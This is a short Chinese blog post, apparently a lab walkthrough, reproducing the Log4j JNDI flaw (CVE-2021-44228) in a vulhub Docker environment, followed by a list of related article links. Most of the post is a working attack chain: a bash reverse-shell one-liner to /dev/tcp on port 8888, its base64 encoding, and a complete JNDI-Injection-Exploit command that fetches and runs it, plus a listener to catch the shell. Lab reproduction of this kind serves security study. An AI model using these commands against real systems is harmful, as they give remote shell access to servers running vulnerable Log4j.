log4j靶场,反弹shell

1.用vulhub靶场搭建,首先进入目录CVE-2021-44228中,docker启动命令

2.发现端口是8983,浏览器访问http://172.16.1.18:8983/

3.用dnslog平台检测dns回显,看看有没有漏洞存在

4.反弹shell到kali(ip为172.16.1.18)的8888端口

bash -i >& /dev/tcp/172.16.1.18/8888 0>&1

然后对上述命令进行base64编码,

YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xOC84ODg4IDA+JjE=

最终 Payload

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xOC84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" -A "172.16.1.18"

同时,我们开启对172.16.1.18:8888端口监听

输入whoami命令查看是否获得shell

相关推荐
haonuy*2 天前
Log4j CVE-2021-44228 漏洞复现详细教程
log4j·教程·漏洞复现·cve-2021-44228
XF小冯4 天前
Log4j2漏洞vul-hub通关教程
log4j
sevevty-seven10 天前
Redis 事务错误处理机制与开发应对策略
数据库·redis·log4j
Ziegler Han10 天前
Java的Gradle项目,使用SLF4J+Log4j2+log4j2.xml
java·log4j·slf4j
杨DaB11 天前
【项目实践】SMBMS(Javaweb版)汇总版
学习·spring·servlet·log4j
fire-flyer11 天前
Spring Boot 源码解析之 Logging
java·spring boot·spring·log4j·logging
allenXer11 天前
Spring Boot测试全景指南:JUnit 5 + Testcontainers实现单元与集成测试
spring boot·微服务·log4j
hqxstudying21 天前
java依赖注入方法
java·spring·log4j·ioc·依赖
新world21 天前
mybatis-plus从入门到入土(二):单元测试
单元测试·log4j·mybatis
编程乐学(Arfan开发工程师)1 个月前
73、单元测试-断言机制
服务器·数据库·servlet·单元测试·sqlite·log4j·mybatis